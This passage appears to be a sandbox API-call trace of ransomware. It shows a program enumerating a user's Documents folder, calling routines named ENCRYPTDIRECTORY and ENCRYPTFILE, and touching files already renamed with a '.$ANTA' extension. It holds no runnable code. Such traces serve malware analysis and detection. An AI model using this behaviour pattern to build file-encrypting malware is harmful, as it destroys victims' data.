RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eada8 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.835] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8d5ee1, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb8d5ee1, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfb8fc10b, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x13f80, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="IWVSvvMxlOfdD1.ods.$ANTA", cAlternateFileName="IWVSVV~1.$AN")) returned 1 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca940 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.836] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6536320, ftCreationTime.dwHighDateTime=0x1d5ee20, ftLastAccessTime.dwLowDateTime=0xc1280e0, ftLastAccessTime.dwHighDateTime=0x1d5e2a8, ftLastWriteTime.dwLowDateTime=0xc1280e0, ftLastWriteTime.dwHighDateTime=0x1d5e2a8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="kc_ drhegB", cAlternateFileName="KC_DRH~1")) returned 1 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.837] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb96e847, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfb96e847, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfba2d404, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0xadd0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Ko5KMbWIjv.pdf.$ANTA", cAlternateFileName="KO5KMB~1.$AN")) returned 1 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca868 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.838] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfba9fb26, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfba9fb26, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfbaec099, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x12020, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="sAJ5q4Jpz7.csv.$ANTA", cAlternateFileName="SAJ5Q4~1.$AN")) returned 1 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8c8 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.838] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ea38 | out: lpFindFileData=0x144ea38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2720, ftCreationTime.dwHighDateTime=0x144ed98, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2720, ftLastWriteTime.dwLowDateTime=0x43e93c8, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ef30, dwReserved1=0x8, cFileName="", cAlternateFileName="ﮀмńဓ+\x10")) returned 0 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8f8 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.839] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|kc_ drhegB", cchCount1=11, lpString2="", cchCount2=0) returned 3 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16) returned 0x1796d88 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x16) returned 0x1797028 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.840] CharUpperBuffW (in: lpsz="ENCRYPTDIRECTORY", cchLength=0x10 | out: lpsz="ENCRYPTDIRECTORY") returned 0x10 [0079.840] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0079.840] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb")) returned 0x10 [0079.840] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\*", lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6536320, ftCreationTime.dwHighDateTime=0x1d5ee20, ftLastAccessTime.dwLowDateTime=0xc1280e0, ftLastAccessTime.dwHighDateTime=0x1d5e2a8, ftLastWriteTime.dwLowDateTime=0xc1280e0, ftLastWriteTime.dwHighDateTime=0x1d5e2a8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cad30, cFileName=".", cAlternateFileName="")) returned 0x41ac780 [0079.841] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb6536320, ftCreationTime.dwHighDateTime=0x1d5ee20, ftLastAccessTime.dwLowDateTime=0xc1280e0, ftLastAccessTime.dwHighDateTime=0x1d5e2a8, ftLastWriteTime.dwLowDateTime=0xc1280e0, ftLastWriteTime.dwHighDateTime=0x1d5e2a8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43cad30, cFileName="..", cAlternateFileName="")) returned 1 [0079.841] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e7f8 | out: lpFindFileData=0x144e7f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20c19b40, ftCreationTime.dwHighDateTime=0x1d5edaa, ftLastAccessTime.dwLowDateTime=0x26ec44f0, ftLastAccessTime.dwHighDateTime=0x1d5ed07, ftLastWriteTime.dwLowDateTime=0x26ec44f0, ftLastWriteTime.dwHighDateTime=0x1d5ed07, nFileSizeHigh=0x0, nFileSizeLow=0x2237, dwReserved0=0x0, dwReserved1=0x43cad30, cFileName="4lc7ZSflvh25kv.pps", cAlternateFileName="4LC7ZS~1.PPS")) returned 1 [0079.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0079.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.841] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68f95ae0, ftCreationTime.dwHighDateTime=0x1d5e9f1, ftLastAccessTime.dwLowDateTime=0xb1d65d40, ftLastAccessTime.dwHighDateTime=0x1d5e7cf, ftLastWriteTime.dwLowDateTime=0xb1d65d40, ftLastWriteTime.dwHighDateTime=0x1d5e7cf, nFileSizeHigh=0x0, nFileSizeLow=0x13b7, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="JzioP.odp", cAlternateFileName="")) returned 1 [0079.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.841] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d566e80, ftCreationTime.dwHighDateTime=0x1d5e286, ftLastAccessTime.dwLowDateTime=0x1927e6d0, ftLastAccessTime.dwHighDateTime=0x1d5ed11, ftLastWriteTime.dwLowDateTime=0x1927e6d0, ftLastWriteTime.dwHighDateTime=0x1d5ed11, nFileSizeHigh=0x0, nFileSizeLow=0xbca0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="lTD44h.ots", cAlternateFileName="")) returned 1 [0079.841] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3ee9540, ftCreationTime.dwHighDateTime=0x1d5ea21, ftLastAccessTime.dwLowDateTime=0x94a22970, ftLastAccessTime.dwHighDateTime=0x1d5eebe, ftLastWriteTime.dwLowDateTime=0x94a22970, ftLastWriteTime.dwHighDateTime=0x1d5eebe, nFileSizeHigh=0x0, nFileSizeLow=0x16373, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="VmdYvxc3Ol-gmt2M.xls", cAlternateFileName="VMDYVX~1.XLS")) returned 1 [0079.846] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacbde450, ftCreationTime.dwHighDateTime=0x1d5ecfb, ftLastAccessTime.dwLowDateTime=0x3c566ca0, ftLastAccessTime.dwHighDateTime=0x1d5e139, ftLastWriteTime.dwLowDateTime=0x3c566ca0, ftLastWriteTime.dwHighDateTime=0x1d5e139, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="WZ9w", cAlternateFileName="")) returned 1 [0079.846] FindNextFileW (in: hFindFile=0x41ac780, lpFindFileData=0x144e7e0 | out: lpFindFileData=0x144e7e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x43e2710, ftCreationTime.dwHighDateTime=0x144eb40, ftLastAccessTime.dwLowDateTime=0x295a83, ftLastAccessTime.dwHighDateTime=0x43e2710, ftLastWriteTime.dwLowDateTime=0x43ea508, ftLastWriteTime.dwHighDateTime=0x356310, nFileSizeHigh=0x29c786, nFileSizeLow=0x1809934, dwReserved0=0x144ecd8, dwReserved1=0x8, cFileName="", cAlternateFileName="礼мńဓ+\x10")) returned 0 [0079.846] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0079.846] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|4lc7ZSflvh25kv.pps|JzioP.odp|lTD44h.ots|VmdYvxc3Ol-gmt2M.xls", cchCount1=61, lpString2="", cchCount2=0) returned 3 [0079.846] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.846] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps", lpFindFileData=0x144ebc8 | out: lpFindFileData=0x144ebc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20c19b40, ftCreationTime.dwHighDateTime=0x1d5edaa, ftLastAccessTime.dwLowDateTime=0x26ec44f0, ftLastAccessTime.dwHighDateTime=0x1d5ed07, ftLastWriteTime.dwLowDateTime=0x26ec44f0, ftLastWriteTime.dwHighDateTime=0x1d5ed07, nFileSizeHigh=0x0, nFileSizeLow=0x2237, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="4lc7ZSflvh25kv.pps", cAlternateFileName="4LC7ZS~1.PPS")) returned 0x41abfc0 [0079.846] FindClose (in: hFindFile=0x41abfc0 | out: hFindFile=0x41abfc0) returned 1 [0079.847] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.847] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.847] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cb030, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0079.847] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\4lc7ZSflvh25kv.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\4lc7zsflvh25kv.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0079.847] FreeLibrary (hLibModule=0x772d0000) returned 1 [0079.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cabf8, 